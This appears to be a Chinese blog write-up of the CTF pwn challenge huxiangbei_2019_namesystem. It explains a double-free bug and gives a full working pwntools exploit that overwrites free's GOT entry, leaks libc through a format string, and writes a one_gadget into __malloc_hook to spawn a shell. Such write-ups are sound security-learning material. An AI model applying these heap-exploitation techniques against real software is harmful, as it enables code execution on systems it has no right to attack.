huxiangbei_2019_namesystem

最新推荐文章于 2023-11-30 22:19:39 发布
最新推荐文章于 2023-11-30 22:19:39 发布
阅读量452 收藏 1
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105856242
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

huxiangbei_2019_namesystem

首先,检查一下程序的保护机制

然后,我们用IDA分析一下

在delete功能里,如果当v1为18的时候,19处的指针就不会被覆盖,此后18和19指向的是同一个堆,因此存在double free漏洞。

#coding:utf8
from pwn import *

#sh = process('./huxiangbei_2019_namesystem')
sh = remote('node3.buuoj.cn',29866)
elf = ELF('./huxiangbei_2019_namesystem')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
printf_plt = elf.plt['printf']

def add(size,content):
   sh.sendlineafter('Your choice :','1')
   sh.sendlineafter('Name Size:',str(size))
   sh.sendafter('Name:',content)

def delete(index):
   sh.sendlineafter('Your choice :','3')
   sh.sendlineafter('The id you want to delete:',str(index))


for i in range(17):
   add(0x20,'a'*0x20)
#17
add(0x50,'b'*0x50)
#18
add(0x60,'a'*0x60)
#19
add(0x50,'c'*0x50)
#got表上伪造一个chunk
fake_chunk_addr = 0x0000000000601FFA
delete(18)
#19位置的指针移到18后没有清零,可以对19 double free
delete(19) #19
delete(17) #17
delete(17) #19
add(0x60,'a'*0x60) #17
add(0x60,'b'*0x60) #18
add(0x60,'c'*0x60) #19
#构造另一个double free
delete(18)
delete(19)
delete(17)
delete(17)
#腾出空间
for i in range(17,-1,-1):
   delete(i)
#将got表伪chunk链接到fastbin
add(0x50,p64(fake_chunk_addr) + '\n') #0
add(0x50,'b'*0x50) #1
add(0x50,'c'*0x50) #2
#修改free的got表为printf_plt
add(0x50,'a'*0xE + p64(printf_plt)[0:6] + '\n') #3
#格式化字符串泄露地址
add(0x20,'%13$p\n') #4
delete(4)
libc_base = int(sh.recvuntil('Done!',drop = True),16) - 0xF0 - libc.sym['__libc_start_main']
malloc_hook_addr = libc_base + libc.symbols['__malloc_hook']
one_gadget_addr = libc_base + 0x4526a
realloc_addr = libc_base + libc.sym['realloc']
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'one_gadget_addr=',hex(one_gadget_addr)
add(0x60,p64(malloc_hook_addr - 0x23) + '\n') #4
add(0x60,'b'*0x60) #5
add(0x60,'c'*0x60) #6
#写malloc_hook
add(0x60,'\x00'*0xB + p64(one_gadget_addr) + p64(realloc_addr + 0x10) + '\n')
#getshell
sh.sendlineafter('Your choice :','1')
sh.sendlineafter('Name Size:','50')

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fastbin关于chunk size检查问题&&花式泄露libc&&极限getshell&&huxiangbei_2019_namesyste
azraelxuemo的博客
04-10 2742
上图就是大家很熟悉的关于fastbin大小的一个检查 首先是里面一层 chunksize 以及外面一层 这是c源码 而对于汇编层面,由于运行的时候知道具体是32位还是64位,所以做了一定的优化 r15就是我们对应的chunk头地址,+8就是size的起始地址 但注意看,我们其实只是取了size的低8位 那么这里就是绕过的关键,网上很多地方其实讲的都不是很多 只要我们找到的size的地方低8位满足如下要求即可 000000yx y满足在2~8之间就好,x随意 同时size高八位也随意 因为可以看到我.
2019 湖湘杯 pwn strng2
yongbaoii的博客
03-26 692
稍作记录
(BUUCTF)huxiangbei_2019_hacknote
最新发布
xy1458214551的博客
11-30 58
buuctf的huxiangbei_2019_hacknote
【静态编译+off by one】huxiangbei_2019_hacknote
huzai9527的博客
04-12 351
【静态编译+off by one】huxiangbei_2019_hacknote 1.ida分析 通过string,找到add函数,然后找到malloc函数 找到 malloc_hook的地址 寻找堆的漏洞 2.思路 申请四个chunk0,1,2,3 大小分别为,0x18,0x30,0x60,0x30 通过off by one 修改 chunk1 的size 位0xb1 (0x30+0x60+0x10+0x10) free(2) free(1) add(0xa0
2019 湖湘杯 HackNote 经验总结
qq_43189757的博客
11-11 911
静态链接的题目, 又学到了一点 程序保护: 保护全关 程序逻辑分析: 通过观察start 的汇编代码找到main函数的地址 箭头
ebcdic.rar_Code Name
09-23
Avoid name clashes with other applications Source Code for Linux v2.13.6.
ReadOnlyBufferException.rar_Code Name
09-23
Class For Name Class Visitor Source Code for Andriod.
api.zip_call api by name
09-20
调用api实现任务转换和得到当前活动任务名称
SDL_name.rar_Code Name
09-24
For copy n and lexicographical compare 3way Source Code for Embedded Linux.
mmp2.rar_Code Name
09-23
code name MMP2 for Linux v2.13.6.
BUUCTF-PWN刷题记录-13(静态编译+去除调试符号)
weixin_44145820的博客
04-27 1301
目录[中关村2019]one_string(unlink) [中关村2019]one_string(unlink) 看这个保护,我以为很简单,然而··· 这题去除了所有符号,并且是静态编译,所以第一步就是把主要函数找出来,如下 在edit函数中,程序会重新计算content的长度,这个时候如果利用了chunk复用,下一个chunk的size也会被计算进长度,这样下次编辑的时候就能覆盖si...
buuoj Pwn writeup 191-195
yongbaoii的博客
06-12 491
191 huxiangbei_2019_hacknote 192 pwnable_simple_login 193 mrctf2020_spfa 194 360chunqiu2017_smallest 195 watevr_2019_voting_machine_1
攻防世界PWN之Hacknote题解
seaaseesa的博客
11-09 1377
Hacknote 首先,查看程序的保护机制 然后拖入IDA分析 这是创建堆,并写入信息。 经过分析,大概是这样的 typedefstructNote{ void*func;//函数指针 char*buf;//内容指针 }Note; //保存Node的指针数组 Note*notes[5]; int...
CTF命令执行漏洞的一些杂七杂八的笔记
chizhaji的博客
02-06 2000
CTF命令执行漏洞的一些杂七杂八的笔记 命令执行漏洞主要是由system、exec、shell_exec,eval等函数能把用户输入的内容当作是命令来执,反引号一般的作用是与system类似,都是把内容作为命令来执行。//不过在这些命令执行函数里面,只有system是有回显的,其他的函数都需要搭配着echo来使用 关于过滤的一些笔记 一般看到有过滤的我都会直接先用echo "npfs "; include($_GET['url']); ?>&url=php://filter/read=conv
2017湖湘杯Writeup
weixin_30642029的博客
11-26 286
RE部分 0x01 Re4newer 解题思路: Step1:die打开,发现有upx壳。 Step2:脱壳,执行upx -d 文件名即可。 Step3:IDA打开,shift+F12看字符串。 点进去,F5看伪代码如图。 Step4:逆算法。点进sub_401080可以看到关键函数的算法。 ...
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2535
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
[笔记]hdfs namenode FSNamesystem分析
iteye_20264的博客
08-30 604
NameNode在内存中维护整个文件系统的元数据镜像,用于HDFS的管理。 NameNode中元数据的管理主要由类FSNamesystem实现。 [quote]/*************************************************** * FSNamesystem does the actual bookkeeping work for the * Dat...
Hadoop源码分析FSNamesystem几个重要的成员变量
坐禅小和尚的专栏
09-27 2798
FSNamesystem中有几个非常重要的变量,对于理解NameNode的实现具有重要意义。下面,我们看一下这几个变量和他的作用。 lblocksMap:blocksMap是类BlocksMap的实例,其代表了Block→{INode、datanodes}的映射。具体代表了每一个Block在哪一个DataNode上存储。datanodeMap:datanodeMap是类Navigable
CMAKE_SYSTEM_NAME
07-27
CMAKE_SYSTEM_NAME是一个变量,用于指示CMake所在的操作系统的名称。它可以是以下值之一: - "Linux" - "Darwin" (macOS) - "Windows" - "Android" - "iOS" - "FreeBSD" - "OpenBSD" - "NetBSD" - "SunOS" - "AIX" ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值